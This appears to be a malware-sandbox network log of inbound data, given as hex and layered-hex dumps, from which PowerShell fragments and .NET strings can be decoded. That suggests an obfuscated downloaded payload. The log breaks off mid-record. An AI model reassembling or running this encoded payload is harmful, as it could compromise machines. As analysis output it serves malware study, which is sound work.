E9E5AABA-44D1857AAC167DFBBA6E848D261154CBA76AB14EEDEEEC2A9E938316A51676E9DF2E5CB9392C31EB61412C43A-A3E4FF8C4C715913F-D8E59D68-87526AD85C227F9EACE7D3BD64B7E3B97-642F4-9F1F76--DFBA83DA89B5A243BB21AA352C2C695BC4E-F8232E9921485B6-361E7552DA2C3-54-22947C-C1156
2021-09-14 14:47:58 UTC	373	IN	Data Raw: 2d 45 45 39 35 41 39 45 35 39 2d 39 36 34 41 44 43 34 42 45 34 32 36 31 31 45 32 42 38 32 39 41 46 37 41 42 33 46 43 34 36 38 33 43 31 37 41 41 36 33 37 41 45 38 44 46 33 34 34 42 41 31 32 43 31 46 39 44 34 43 36 41 35 35 41 39 42 32 38 45 32 31 2d 42 45 43 34 33 36 46 43 43 46 44 38 35 31 32 34 41 33 41 33 35 38 41 41 44 34 37 31 37 45 37 38 33 39 36 34 43 42 36 44 2d 44 42 38 32 41 37 46 36 39 31 42 33 44 32 34 39 2d 36 46 34 42 37 42 37 46 36 39 33 42 41 38 44 35 41 43 45 45 32 32 41 36 32 46 45 42 32 42 32 42 32 32 35 33 44 44 35 36 39 38 35 38 35 33 45 37 37 43 35 36 42 36 35 45 34 32 32 37 44 37 32 38 31 2d 34 36 41 35 34 32 33 46 37 36 38 34 39 43 34 31 35 42 32 31 46 39 39 37 41 36 35 44 35 34 41 31 42 46 44 46 38 46 35 42 45 43 34 33 39 34 41 35 Data Ascii: -EE95A9E59-964ADC4BE42611E2B829AF7AB3FC4683C17AA637AE8DF344BA12C1F9D4C6A55A9B28E21-BEC436FCCFD85124A3A358AAD4717E783964CB6D-DB82A7F691B3D249-6F4B7B7F693BA8D5ACEE22A62FEB2B2B2253DD56985853E77C56B65E4227D7281-46A5423F76849C415B21F997A65D54A1BFDF8F5BEC4394A5
2021-09-14 14:47:58 UTC	380	IN	Data Raw: 44 42 37 42 32 35 33 35 36 39 46 39 43 42 32 42 46 43 35 31 36 38 32 2d 2d 45 44 43 46 33 45 38 43 46 37 45 39 35 36 45 34 32 46 36 44 42 32 32 36 41 31 39 34 33 44 31 41 46 32 36 37 37 2d 39 36 32 38 35 43 37 38 42 42 42 37 44 37 33 36 31 44 31 39 2d 34 2d 46 34 41 37 34 33 32 37 36 44 35 39 41 35 33 2d 34 42 45 42 43 35 33 44 31 39 43 41 42 33 41 35 37 37 43 39 33 45 46 41 44 31 35 35 33 46 31 37 32 2d 38 43 36 41 36 45 33 35 35 45 43 34 31 41 32 44 45 32 42 37 39 43 37 33 42 38 35 38 43 31 44 38 42 33 31 45 33 37 46 46 33 43 34 33 43 35 31 44 31 35 39 37 37 45 42 38 45 45 44 41 34 42 36 39 37 31 43 45 44 37 37 37 45 43 36 2d 36 38 33 2d 31 42 31 33 31 44 45 46 41 32 38 43 37 42 33 43 35 33 34 37 44 45 36 31 39 43 33 35 45 42 44 32 32 2d 38 42 44 45 42 Data Ascii: DB7B253569F9CB2BFC51682--EDCF3E8CF7E956E42F6DB226A1943D1AF2677-96285C78BBB7D7361D19-4-F4A743276D59A53-4BEBC53D19CAB3A577C93EFAD1553F172-8C6A6E355EC41A2DE2B79C73B858C1D8B31E37FF3C43C51D15977EB8EEDA4B6971CED777EC6-683-1B131DEFA28C7B3C5347DE619C35EBD22-8BDEB
2021-09-14 14:47:58 UTC	387	IN	Data Raw: 42 34 41 43 34 34 41 43 37 31 39 37 42 38 32 2d 2d 31 39 37 31 34 43 46 32 41 31 35 35 32 43 38 46 32 33 2d 43 39 43 38 35 31 2d 41 38 46 39 43 33 38 35 33 41 2d 45 44 42 37 31 37 46 43 45 36 42 35 45 2d 42 32 44 38 32 2d 43 35 35 42 41 42 31 36 2d 35 39 31 37 41 35 34 34 43 33 35 46 43 46 34 2d 38 44 38 38 33 45 46 39 32 34 46 36 43 2d 33 36 31 42 41 46 31 35 42 45 31 44 33 31 39 43 34 35 32 33 32 32 31 37 45 37 45 42 43 44 38 34 37 46 32 39 35 43 36 32 32 46 32 44 38 45 45 35 46 37 44 37 39 36 35 32 42 43 45 37 36 45 43 42 33 37 2d 44 45 34 38 42 44 2d 31 43 39 38 36 45 45 39 46 43 43 36 37 31 31 42 36 33 32 32 44 45 46 32 45 42 44 35 37 35 37 46 44 32 39 45 36 45 32 42 39 44 43 33 34 38 32 32 37 2d 44 38 36 39 32 43 44 41 31 32 37 37 35 35 2d 41 39 39 Data Ascii: B4AC44AC7197B82--19714CF2A1552C8F23-C9C851-A8F9C3853A-EDB717FCE6B5E-B2D82-C55BAB16-5917A544C35FCF4-8D883EF924F6C-361BAF15BE1D319C45232217E7EBCD847F295C622F2D8EE5F7D79652BCE76ECB37-DE48BD-1C986EE9FCC6711B6322DEF2EBD5757FD29E6E2B9DC348227-D8692CDA127755-A99
2021-09-14 14:47:59 UTC	395	IN	Data Raw: 46 44 2d 38 2d 37 31 35 41 33 41 31 36 39 43 45 46 2d 36 35 46 41 44 37 41 36 34 45 45 45 42 32 46 32 36 42 2d 33 38 2d 34 31 41 46 46 42 33 38 43 36 44 31 2d 31 31 43 45 31 35 43 2d 44 34 46 34 34 35 39 39 42 2d 43 31 36 38 2d 44 34 33 31 44 43 41 46 35 41 39 39 44 34 33 37 32 43 38 33 42 31 32 42 2d 43 33 33 32 44 34 33 32 42 46 39 37 39 2d 2d 34 41 43 44 39 31 39 34 46 32 39 32 38 44 2d 43 39 37 44 43 42 45 35 42 34 31 32 42 38 43 38 33 38 44 34 33 44 2d 42 35 36 46 35 43 36 2d 36 33 44 41 41 34 41 39 35 45 44 31 43 46 33 43 39 34 33 45 39 43 42 41 36 35 2d 33 39 37 35 44 36 2d 44 39 31 43 37 39 34 35 33 2d 45 31 39 34 46 36 37 39 34 39 41 41 35 34 38 46 46 46 33 34 31 38 2d 44 31 38 31 32 35 31 2d 32 43 37 37 42 44 45 41 41 41 46 42 35 2d 46 45 43 43 Data Ascii: FD-8-715A3A169CEF-65FAD7A64EEEB2F26B-38-41AFFB38C6D1-11CE15C-D4F44599B-C168-D431DCAF5A99D4372C83B12B-C332D432BF979--4ACD9194F2928D-C97DCBE5B412B8C838D43D-B56F5C6-63DAA4A95ED1CF3C943E9CBA65-3975D6-D91C79453-E194F67949AA548FFF3418-D181251-2C77BDEAAAFB5-FECC
2021-09-14 14:47:59 UTC	402	IN	Data Raw: 45 37 45 39 37 32 44 46 46 45 45 35 36 38 39 2d 39 37 41 37 32 33 33 45 36 37 35 45 37 2d 36 42 42 46 44 46 39 43 45 36 41 39 35 43 41 36 34 41 42 38 31 46 33 36 38 45 33 34 37 41 33 37 45 37 43 31 37 33 36 2d 31 35 34 46 42 31 43 33 38 42 31 39 46 38 41 35 39 36 43 2d 34 43 41 42 43 32 44 32 41 33 33 46 37 32 32 31 43 33 43 45 34 31 41 46 34 41 31 33 36 43 2d 45 43 44 35 45 36 41 43 2d 38 43 45 31 37 39 31 32 45 42 45 45 44 42 33 44 31 34 31 43 35 35 32 42 2d 44 34 33 37 33 41 42 35 36 31 42 44 38 32 38 41 45 2d 46 36 33 39 36 38 42 38 45 33 38 2d 44 43 43 41 45 45 41 46 41 33 2d 42 31 43 36 36 41 32 43 46 35 44 42 33 41 32 32 37 37 39 36 43 41 34 41 35 2d 44 43 43 42 2d 36 41 45 46 44 33 43 2d 34 34 39 32 44 41 36 37 33 36 32 45 2d 44 39 45 37 42 32 41 Data Ascii: E7E972DFFEE5689-97A7233E675E7-6BBFDF9CE6A95CA64AB81F368E347A37E7C1736-154FB1C38B19F8A596C-4CABC2D2A33F7221C3CE41AF4A136C-ECD5E6AC-8CE17912EBEEDB3D141C552B-D4373AB561BD828AE-F63968B8E38-DCCAEEAFA3-B1C66A2CF5DB3A227796CA4A5-DCCB-6AEFD3C-4492DA67362E-D9E7B2A
2021-09-14 14:47:59 UTC	409	IN	Data Raw: 42 38 2d 41 43 43 2d 35 33 39 37 45 39 41 32 43 32 37 33 35 43 38 41 42 41 46 41 2d 38 34 38 36 43 39 42 34 45 39 31 34 39 38 31 33 32 36 45 36 39 42 38 42 33 2d 2d 46 34 41 34 38 35 41 46 36 2d 46 45 43 43 44 42 32 45 43 35 36 41 31 34 41 42 39 37 37 42 46 45 32 45 38 37 44 31 38 32 41 33 2d 44 2d 37 43 2d 36 31 32 36 45 32 39 46 44 31 46 36 43 45 44 33 45 39 42 36 32 33 33 31 33 33 34 43 39 32 33 33 31 44 32 35 31 46 44 2d 43 46 43 45 38 33 31 45 45 37 41 37 32 33 41 42 44 44 36 45 2d 32 37 42 46 42 42 32 41 43 31 45 45 37 32 37 33 32 2d 33 33 45 31 2d 45 33 34 37 44 33 38 2d 33 34 34 42 42 38 31 38 37 32 33 44 41 36 46 46 39 44 38 37 41 45 34 46 34 36 43 36 2d 42 43 38 39 39 35 33 39 31 31 36 34 43 38 37 43 36 41 34 34 45 35 35 37 46 44 34 36 43 34 36 Data Ascii: B8-ACC-5397E9A2C2735C8ABAFA-8486C9B4E914981326E69B8B3--F4A485AF6-FECCDB2EC56A14AB977BFE2E87D182A3-D-7C-6126E29FD1F6CED3E9B62331334C92331D251FD-CFCE831EE7A723ABDD6E-27BFBB2AC1EE72732-33E1-E347D38-344BB818723DA6FF9D87AE4F46C6-BC8995391164C87C6A44E557FD46C46
2021-09-14 14:47:59 UTC	416	IN	Data Raw: 2d 36 39 2d 36 65 2d 36 34 2d 36 39 2d 36 65 2d 36 37 2d 32 38 2d 32 39 2d 35 64 2d 30 61 2d 32 30 2d 32 30 2d 32 30 2d 32 30 2d 35 62 2d 34 66 2d 37 35 2d 37 34 2d 37 30 2d 37 35 2d 37 34 2d 35 34 2d 37 39 2d 37 30 2d 36 35 2d 32 38 2d 35 62 2d 36 32 2d 37 39 2d 37 34 2d 36 35 2d 35 62 2d 35 64 2d 35 64 2d 32 39 2d 35 64 2d 30 61 2d 32 30 2d 32 30 2d 32 30 2d 32 30 2d 37 30 2d 36 31 2d 37 32 2d 36 31 2d 36 64 2d 32 38 2d 30 61 2d 32 30 2d 32 30 2d 32 30 2d 32 30 2d 32 30 2d 32 30 2d 32 30 2d 32 30 2d 35 62 2d 35 30 2d 36 31 2d 37 32 2d 36 31 2d 36 64 2d 36 35 2d 37 34 2d 36 35 2d 37 32 2d 32 38 2d 34 64 2d 36 31 2d 36 65 2d 36 34 2d 36 31 2d 37 34 2d 36 66 2d 37 32 2d 37 39 2d 33 64 2d 32 34 2d 37 34 2d 37 32 2d 37 35 2d 36 35 2d 32 39 2d 35 64 2d 32 30 Data Ascii: -69-6e-64-69-6e-67-28-29-5d-0a-20-20-20-20-5b-4f-75-74-70-75-74-54-79-70-65-28-5b-62-79-74-65-5b-5d-5d-29-5d-0a-20-20-20-20-70-61-72-61-6d-28-0a-20-20-20-20-20-20-20-20-5b-50-61-72-61-6d-65-74-65-72-28-4d-61-6e-64-61-74-6f-72-79-3d-24-74-72-75-65-29-5d-20
2021-09-14 14:47:59 UTC	424	IN	Data Raw: 33 31 2d 33 30 2d 33 36 2d 33 31 2d 34 36 2d 33 32 2d 33 39 2d 33 39 2d 33 34 2d 33 31 2d 33 33 2d 33 30 2d 33 37 2d 33 31 2d 33 36 2d 33 31 2d 33 33 2d 33 30 2d 33 38 2d 33 37 2d 34 35 2d 33 30 2d 33 38 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 34 2d 33 30 2d 33 39 2d 33 37 2d 34 32 2d 33 30 2d 34 32 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 34 2d 33 31 2d 33 31 2d 33 30 2d 33 37 2d 33 31 2d 34 31 2d 34 34 2d 33 36 2d 33 31 2d 34 31 2d 34 34 2d 33 36 2d 33 31 2d 33 32 2d 33 30 2d 33 38 2d 33 31 2d 34 31 2d 33 31 2d 33 32 2d 33 30 2d 33 30 2d 33 36 2d 34 36 2d 33 32 2d 33 34 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 36 2d 33 31 2d 33 36 2d 34 36 2d 34 35 2d 33 30 2d 33 31 2d 33 31 2d 33 33 2d 33 31 2d 33 35 2d 33 31 2d 33 31 2d Data Ascii: 31-30-36-31-46-32-39-39-34-31-33-30-37-31-36-31-33-30-38-37-45-30-38-30-30-30-30-30-34-30-39-37-42-30-42-30-30-30-30-30-34-31-31-30-37-31-41-44-36-31-41-44-36-31-32-30-38-31-41-31-32-30-30-36-46-32-34-30-30-30-30-30-36-31-36-46-45-30-31-31-33-31-35-31-31-
2021-09-14 14:47:59 UTC	431	IN	Data Raw: 30 2d 33 30 2d 33 30 2d 33 30 2d 33 37 2d 33 30 2d 33 32 2d 33 30 2d 33 37 2d 33 37 2d 34 35 2d 34 35 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 32 2d 33 38 2d 33 34 2d 34 34 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 36 2d 33 32 2d 33 30 2d 33 36 2d 34 35 2d 34 35 2d 33 38 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 32 2d 33 38 2d 33 34 2d 33 33 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 36 2d 33 32 2d 33 30 2d 33 31 2d 33 36 2d 34 36 2d 33 33 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 32 2d 33 38 2d 33 33 2d 33 39 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 36 2d 33 32 2d 33 30 2d 33 36 2d 34 31 2d 34 35 2d 33 31 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 32 2d 33 38 2d 33 32 2d 34 36 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 Data Ascii: 0-30-30-30-37-30-32-30-37-37-45-45-30-30-30-30-32-38-34-44-30-30-30-30-30-36-32-30-36-45-45-38-30-30-30-30-32-38-34-33-30-30-30-30-30-36-32-30-31-36-46-33-30-30-30-30-32-38-33-39-30-30-30-30-30-36-32-30-36-41-45-31-30-30-30-30-32-38-32-46-30-30-30-30-30-3
2021-09-14 14:47:59 UTC	438	IN	Data Raw: 2d 33 31 2d 34 33 2d 33 36 2d 33 33 2d 33 36 2d 33 36 2d 33 31 2d 34 33 2d 33 36 2d 33 33 2d 33 32 2d 34 32 2d 33 34 2d 33 39 2d 33 32 2d 33 38 2d 33 31 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 34 31 2d 33 30 2d 33 36 2d 33 32 2d 33 38 2d 33 31 2d 33 37 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 34 31 2d 33 32 2d 34 32 2d 33 36 2d 33 31 2d 33 31 2d 33 32 2d 33 30 2d 33 32 2d 33 32 2d 33 38 2d 33 31 2d 33 38 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 34 31 2d 33 32 2d 33 33 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 33 2d 33 36 2d 33 30 2d 33 32 2d 33 32 2d 34 32 2d 33 30 2d 34 33 2d 33 32 2d 34 32 2d 33 34 2d 33 35 2d 33 33 Data Ascii: -31-43-36-33-36-36-31-43-36-33-32-42-34-39-32-38-31-30-30-30-30-30-30-41-30-36-32-38-31-37-30-30-30-30-30-41-32-42-36-31-31-32-30-32-32-38-31-38-30-30-30-30-30-41-32-33-30-30-30-30-30-30-30-30-30-30-30-30-30-30-30-30-33-36-30-32-32-42-30-43-32-42-34-35-33
2021-09-14 14:47:59 UTC	445	IN	Data Raw: 33 38 2d 33 36 2d 33 35 2d 33 32 2d 33 30 2d 34 32 2d 34 33 2d 34 36 2d 33 38 2d 33 37 2d 33 32 2d 33 30 2d 33 33 2d 33 32 2d 33 30 2d 34 32 2d 33 36 2d 34 36 2d 33 38 2d 33 37 2d 33 32 2d 33 30 2d 33 33 2d 33 35 2d 33 39 2d 33 32 2d 33 30 2d 33 33 2d 33 32 2d 33 33 2d 33 39 2d 33 34 2d 34 31 2d 33 31 2d 33 33 2d 33 36 2d 33 36 2d 33 32 2d 33 30 2d 33 37 2d 33 37 2d 33 37 2d 33 36 2d 34 32 2d 33 35 2d 33 32 2d 33 35 2d 33 35 2d 33 38 2d 33 32 2d 33 30 2d 33 36 2d 34 31 2d 33 33 2d 34 34 2d 33 36 2d 34 32 2d 33 31 2d 33 32 2d 33 35 2d 33 39 2d 33 36 2d 33 36 2d 33 32 2d 33 30 2d 34 35 2d 33 32 2d 34 34 2d 33 32 2d 34 32 2d 33 36 2d 33 31 2d 33 36 2d 33 32 2d 33 30 2d 33 31 2d 34 35 2d 33 31 2d 34 34 2d 33 34 2d 33 39 2d 34 35 2d 33 39 2d 33 35 2d 33 38 2d Data Ascii: 38-36-35-32-30-42-43-46-38-37-32-30-33-32-30-42-36-46-38-37-32-30-33-35-39-32-30-33-32-33-39-34-41-31-33-36-36-32-30-37-37-37-36-42-35-32-35-35-38-32-30-36-41-33-44-36-42-31-32-35-39-36-36-32-30-45-32-44-32-42-36-31-36-32-30-31-45-31-44-34-39-45-39-35-38-
2021-09-14 14:47:59 UTC	453	IN	Data Raw: 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 34 31 2d 33 33 2d 33 38 2d 34 31 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 31 2d 33 32 2d 33 30 2d 33 30 2d 33 32 2d 33 30 2d 33 37 2d 33 39 2d 33 32 2d 34 33 2d 34 36 2d 34 36 2d 33 32 2d 33 37 2d 33 36 2d 33 36 2d 33 32 2d 33 30 2d 33 32 2d 33 35 2d 33 36 2d 33 31 2d 34 31 2d 33 38 2d 33 30 2d 33 31 2d 33 35 2d 33 39 2d 33 32 2d 33 30 2d 33 32 2d 33 36 2d 34 35 2d 33 38 2d 34 36 2d 34 36 2d 33 32 2d 33 32 2d 33 35 2d 33 38 2d 33 36 2d 33 36 2d 33 32 2d 33 30 2d 33 37 2d 33 30 2d 34 31 2d 33 35 2d 34 31 2d 33 37 2d 33 30 2d 33 36 2d 33 35 2d 33 39 2d 33 32 2d 33 38 2d 33 31 2d 34 36 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 34 31 2d 33 32 2d 34 32 2d 33 33 2d 33 39 2d 33 31 2d 33 Data Ascii: 0-30-30-30-30-41-33-38-41-30-30-30-30-30-30-30-31-32-30-30-32-30-37-39-32-43-46-46-32-37-36-36-32-30-32-35-36-31-41-38-30-31-35-39-32-30-32-36-45-38-46-46-32-32-35-38-36-36-32-30-37-30-41-35-41-37-30-36-35-39-32-38-31-46-30-30-30-30-30-41-32-42-33-39-31-3
2021-09-14 14:47:59 UTC	460	IN	Data Raw: 2d 34 36 2d 34 35 2d 33 30 2d 33 39 2d 33 30 2d 33 32 2d 33 30 2d 33 30 2d 33 32 2d 33 30 2d 34 36 2d 33 36 2d 33 31 2d 33 32 2d 34 35 2d 34 36 2d 34 32 2d 34 34 2d 33 36 2d 33 36 2d 33 32 2d 33 30 2d 33 32 2d 34 35 2d 33 35 2d 33 37 2d 34 35 2d 33 30 2d 34 36 2d 33 38 2d 33 35 2d 33 38 2d 33 32 2d 33 30 2d 34 32 2d 34 36 2d 33 30 2d 33 32 2d 33 30 2d 34 34 2d 34 34 2d 34 34 2d 33 36 2d 33 31 2d 33 36 2d 33 36 2d 33 36 2d 33 35 2d 33 32 2d 33 30 2d 34 32 2d 33 31 2d 34 34 2d 34 33 2d 34 34 2d 33 32 2d 33 31 2d 33 38 2d 33 36 2d 33 31 2d 33 36 2d 33 35 2d 33 32 2d 33 30 2d 33 34 2d 33 37 2d 33 39 2d 34 31 2d 33 32 2d 34 35 2d 34 36 2d 34 36 2d 33 35 2d 33 38 2d 33 35 2d 34 36 2d 33 39 2d 33 31 2d 34 36 2d 34 35 2d 33 30 2d 33 39 2d 33 30 2d 33 32 2d 33 30 Data Ascii: -46-45-30-39-30-32-30-30-32-30-46-36-31-32-45-46-42-44-36-36-32-30-32-45-35-37-45-30-46-38-35-38-32-30-42-46-30-32-30-44-44-44-36-31-36-36-36-35-32-30-42-31-44-43-44-32-31-38-36-31-36-35-32-30-34-37-39-41-32-45-46-46-35-38-35-46-39-31-46-45-30-39-30-32-30
2021-09-14 14:47:59 UTC	467	IN	Data Raw: 33 34 2d 33 30 2d 33 30 2d 34 34 2d 33 37 2d 33 30 2d 33 32 2d 33 33 2d 33 36 2d 33 30 2d 33 30 2d 34 32 2d 34 35 2d 33 30 2d 33 32 2d 34 34 2d 34 32 2d 33 30 2d 33 32 2d 33 30 2d 33 31 2d 33 30 2d 33 30 2d 34 33 2d 33 35 2d 33 30 2d 33 32 2d 34 36 2d 33 32 2d 33 30 2d 33 31 2d 33 33 2d 33 31 2d 33 30 2d 33 30 2d 34 32 2d 33 35 2d 33 30 2d 33 30 2d 34 35 2d 34 33 2d 33 30 2d 33 32 2d 33 33 2d 33 36 2d 33 30 2d 33 30 2d 34 32 2d 34 35 2d 33 30 2d 33 30 2d 34 36 2d 33 30 2d 33 30 2d 33 32 2d 33 30 2d 33 31 2d 33 30 2d 33 30 2d 34 33 2d 33 30 2d 33 30 2d 33 30 2d 34 36 2d 33 32 2d 33 30 2d 33 31 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 38 2d 33 30 2d 33 30 2d 33 30 2d 33 39 2d 33 31 2d 33 32 2d 33 30 2d 34 32 2d 33 35 2d Data Ascii: 34-30-30-44-37-30-32-33-36-30-30-42-45-30-32-44-42-30-32-30-31-30-30-43-35-30-32-46-32-30-31-33-31-30-30-42-35-30-30-45-43-30-32-33-36-30-30-42-45-30-30-46-30-30-32-30-31-30-30-43-30-30-30-46-32-30-31-30-30-30-30-30-30-30-30-38-30-30-30-39-31-32-30-42-35-
2021-09-14 14:47:59 UTC	474	IN	Data Raw: 30 2d 33 32 2d 34 31 2d 34 32 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 32 2d 33 30 2d 33 30 2d 33 31 2d 33 30 2d 33 30 2d 34 32 2d 33 35 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 31 2d 33 30 2d 33 30 2d 34 32 2d 33 35 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 32 2d 33 30 2d 33 30 2d 33 32 2d 33 30 2d 33 30 2d 34 32 2d 34 35 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 31 2d 33 30 2d 33 30 2d 34 32 2d 33 35 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 32 2d 33 30 2d 33 30 2d 34 32 2d 34 35 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 31 2d 33 30 2d 33 30 2d 33 38 2d 34 33 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 32 2d 33 30 2d 33 Data Ascii: 0-32-41-42-30-30-30-30-32-30-30-31-30-30-42-35-30-30-30-30-30-30-30-31-30-30-42-35-30-30-30-30-32-30-30-32-30-30-42-45-30-30-30-30-30-30-30-31-30-30-42-35-30-30-30-30-30-30-30-32-30-30-42-45-30-30-30-30-30-30-30-31-30-30-38-43-30-30-30-30-30-30-30-32-30-3
2021-09-14 14:47:59 UTC	481	IN	Data Raw: 2d 34 36 2d 33 33 2d 33 30 2d 33 33 2d 34 32 2d 33 32 2d 33 30 2d 33 30 2d 34 34 2d 33 31 2d 33 30 2d 33 30 2d 34 36 2d 33 33 2d 33 30 2d 33 33 2d 34 36 2d 33 34 2d 33 30 2d 33 32 2d 34 34 2d 33 39 2d 33 30 2d 33 30 2d 34 36 2d 33 33 2d 33 30 2d 33 33 2d 34 32 2d 33 32 2d 33 30 2d 33 30 2d 34 35 2d 33 31 2d 33 30 2d 33 30 2d 34 36 2d 33 33 2d 33 30 2d 33 33 2d 33 32 2d 33 31 2d 33 30 2d 33 33 2d 34 36 2d 33 31 2d 33 30 2d 33 30 2d 34 36 2d 33 33 2d 33 30 2d 33 33 2d 33 33 2d 33 30 2d 33 30 2d 33 33 2d 34 36 2d 33 39 2d 33 30 2d 33 30 2d 34 36 2d 33 33 2d 33 30 2d 33 33 2d 33 33 2d 33 30 2d 33 30 2d 33 33 2d 33 30 2d 33 31 2d 33 30 2d 33 31 2d 34 36 2d 33 33 2d 33 30 2d 33 33 2d 33 33 2d 33 30 2d 33 30 2d 33 33 2d 33 30 2d 33 39 2d 33 30 2d 33 31 2d 34 36 Data Ascii: -46-33-30-33-42-32-30-30-44-31-30-30-46-33-30-33-46-34-30-32-44-39-30-30-46-33-30-33-42-32-30-30-45-31-30-30-46-33-30-33-32-31-30-33-46-31-30-30-46-33-30-33-33-30-30-33-46-39-30-30-46-33-30-33-33-30-30-33-30-31-30-31-46-33-30-33-33-30-30-33-30-39-30-31-46
2021-09-14 14:47:59 UTC	489	IN	Data Raw: 33 30 2d 33 35 2d 33 33 2d 33 37 2d 33 34 2d 33 37 2d 33 32 2d 33 36 2d 33 39 2d 33 36 2d 34 35 2d 33 36 2d 33 37 2d 33 30 2d 33 30 2d 33 36 2d 33 37 2d 33 36 2d 33 35 2d 33 37 2d 33 34 2d 33 35 2d 34 36 2d 33 34 2d 34 33 2d 33 36 2d 33 35 2d 33 36 2d 34 35 2d 33 36 2d 33 37 2d 33 37 2d 33 34 2d 33 36 2d 33 38 2d 33 30 2d 33 30 2d 33 36 2d 33 39 2d 33 30 2d 33 30 2d 33 36 2d 34 31 2d 33 30 2d 33 30 2d 33 34 2d 33 31 2d 33 37 2d 33 33 2d 33 37 2d 33 39 2d 33 36 2d 34 35 2d 33 36 2d 33 33 2d 33 34 2d 33 33 2d 33 36 2d 33 31 2d 33 36 2d 34 33 2d 33 36 2d 34 33 2d 33 36 2d 33 32 2d 33 36 2d 33 31 2d 33 36 2d 33 33 2d 33 36 2d 34 32 2d 33 30 2d 33 30 2d 33 34 2d 34 34 2d 33 36 2d 33 31 2d 33 37 2d 33 32 2d 33 37 2d 33 33 2d 33 36 2d 33 38 2d 33 36 2d 33 31 2d Data Ascii: 30-35-33-37-34-37-32-36-39-36-45-36-37-30-30-36-37-36-35-37-34-35-46-34-43-36-35-36-45-36-37-37-34-36-38-30-30-36-39-30-30-36-41-30-30-34-31-37-33-37-39-36-45-36-33-34-33-36-31-36-43-36-43-36-32-36-31-36-33-36-42-30-30-34-44-36-31-37-32-37-33-36-38-36-31-
2021-09-14 14:47:59 UTC	496	IN	Data Raw: 30 2d 33 35 2d 33 30 2d 33 38 2d 33 30 2d 33 34 2d 33 30 2d 33 30 2d 33 30 2d 33 31 2d 33 30 2d 33 38 2d 33 30 2d 33 39 2d 33 30 2d 33 35 2d 33 30 2d 33 30 2d 33 30 2d 33 31 2d 33 31 2d 33 32 2d 33 33 2d 34 34 2d 33 30 2d 33 38 2d 33 30 2d 33 34 2d 33 30 2d 34 31 2d 33 30 2d 33 31 2d 33 31 2d 33 32 2d 33 30 2d 34 33 2d 33 30 2d 33 34 2d 33 30 2d 34 31 2d 33 30 2d 33 31 2d 33 31 2d 33 32 2d 33 31 2d 33 30 2d 33 30 2d 33 34 2d 33 30 2d 34 31 2d 33 30 2d 33 31 2d 33 31 2d 33 32 2d 33 31 2d 33 34 2d 33 30 2d 33 34 2d 33 30 2d 34 31 2d 33 30 2d 33 31 2d 33 31 2d 33 32 2d 33 31 2d 33 38 2d 33 30 2d 33 34 2d 33 30 2d 34 31 2d 33 30 2d 33 31 2d 33 31 2d 33 32 2d 33 31 2d 34 33 2d 33 30 2d 33 34 2d 33 30 2d 34 31 2d 33 30 2d 33 31 2d 33 31 2d 33 32 2d 33 32 2d 33 Data Ascii: 0-35-30-38-30-34-30-30-30-31-30-38-30-39-30-35-30-30-30-31-31-32-33-44-30-38-30-34-30-41-30-31-31-32-30-43-30-34-30-41-30-31-31-32-31-30-30-34-30-41-30-31-31-32-31-34-30-34-30-41-30-31-31-32-31-38-30-34-30-41-30-31-31-32-31-43-30-34-30-41-30-31-31-32-32-3
2021-09-14 14:47:59 UTC	503	IN	Data Raw: 2d 33 34 2d 33 33 2d 33 30 2d 33 30 2d 33 36 2d 34 36 2d 33 30 2d 33 30 2d 33 36 2d 34 34 2d 33 30 2d 33 30 2d 33 36 2d 34 34 2d 33 30 2d 33 30 2d 33 36 2d 33 35 2d 33 30 2d 33 30 2d 33 36 2d 34 35 2d 33 30 2d 33 30 2d 33 37 2d 33 34 2d 33 30 2d 33 30 2d 33 37 2d 33 33 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 32 2d 33 32 2d 33 30 2d 33 30 2d 33 30 2d 33 31 2d 33 30 2d 33 30 2d 33 30 2d 33 31 2d 33 30 2d 33 30 2d 33 34 2d 33 33 2d 33 30 2d 33 30 2d 33 36 2d 34 36 2d 33 30 2d 33 30 2d 33 36 2d 34 34 2d 33 30 2d 33 30 2d 33 37 2d 33 30 2d 33 30 2d 33 30 2d 33 36 2d 33 31 2d 33 30 2d 33 30 2d 33 36 2d 34 35 2d 33 30 2d 33 30 2d 33 37 2d 33 39 2d 33 30 2d 33 30 2d 33 34 Data Ascii: 